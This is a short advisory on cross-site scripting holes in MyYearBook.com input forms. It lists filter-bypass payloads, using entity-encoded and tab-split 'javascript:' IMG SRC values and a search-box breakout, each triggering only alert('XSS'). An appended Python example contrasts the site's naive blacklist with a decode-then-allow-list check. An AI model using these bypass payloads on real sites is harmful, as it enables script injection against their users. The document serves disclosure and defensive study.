MyYearBook.com - XSS



MyYearBook.com - Personal community site like myspace.com

Affected files:

Input forms of:

editing profile
posting a blog
search boxes
posting a bulletin
posting a comment

---------------------------

XSS Vulnerabilities proof of concept:

When editing your profile, it seems <script> tags are filtered to <notallowed> tags, and the word javascript is filtered to the words "not allowed". To bypass this, we can convert the script tags or the word javascript by using hex encoding. Below are examples of places where user-submitted data isn't properly filtered before the page is dynamically generated.


Profile input:

All the user has to do is put the following in any input box in his profile: <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>


Blog subject input:

<IMG SRC="jav&#x09;ascript:alert('XSS');">

Photo caption input:

Same as above.
<IMG SRC="jav&#x09;ascript:alert('XSS');">


Any search box input:

"><IMG SRC="jav&#x09;ascript:alert('XSS');"><"

Posting a bulletin input:

In the message input box the following works:

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>


Posting a comment:

<IMG SRC="jav ascript:alert('XSS');">

Make sure tab is enabled.
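Added example, not part of the advisory and not the site's code: the filter behaviour described above (string replacement of two blacklisted tokens) placed next to a scheme allow-list that decodes character references and strips control characters before checking, run over constructed SRC values shaped like the payloads listed. Function names and sample values are this example's own assumptions.

```python
import html
import re

# Filter behaviour the advisory describes: plain string replacement of
# two blacklisted tokens.  (Reconstructed for illustration, not site code.)
def naive_filter(text: str) -> str:
    return text.replace("<script>", "<notallowed>").replace("javascript", "not allowed")

# Constructed SRC attribute values shaped like the advisory's payloads,
# plus one benign image URL.
SAMPLE_SRC_VALUES = {
    "entity_encoded": "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)",
    "tab_entity": "jav&#x09;ascript:alert(1)",
    "raw_tab": "jav\tascript:alert(1)",
    "benign": "http://example.com/photo.jpg",
}

SAFE_SCHEMES = {"http", "https"}
SCHEME_RE = re.compile(r"^([a-z][a-z0-9+.\-]*):")

def normalize_url(value: str) -> str:
    """Decode character references until stable (defeats double encoding),
    then drop ASCII control characters and spaces, which browsers ignore
    when they parse a URL scheme."""
    decoded = value
    for _ in range(5):
        again = html.unescape(decoded)
        if again == decoded:
            break
        decoded = again
    return re.sub(r"[\x00-\x20\x7f]", "", decoded).lower()

def url_is_allowed(value: str) -> bool:
    """Allow-list check on the normalized scheme; scheme-less (relative)
    URLs pass, anything else must be http or https."""
    match = SCHEME_RE.match(normalize_url(value))
    return match is None or match.group(1) in SAFE_SCHEMES

def blacklist_bypassed(value: str) -> bool:
    """True when the token blacklist leaves the value untouched but the
    scheme check still rejects it, i.e. the blacklist alone would let it through."""
    return naive_filter(value) == value and not url_is_allowed(value)

if __name__ == "__main__":
    for name, value in SAMPLE_SRC_VALUES.items():
        print(f"{name:15} blacklist_bypassed={blacklist_bypassed(value)}")
```

The point for a fix is the order of operations: decode and normalize first, then decide on the scheme with an allow-list, rather than searching the raw input for blacklisted words.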

------------------------------------------------

Luny - http://www.youfucktard.com


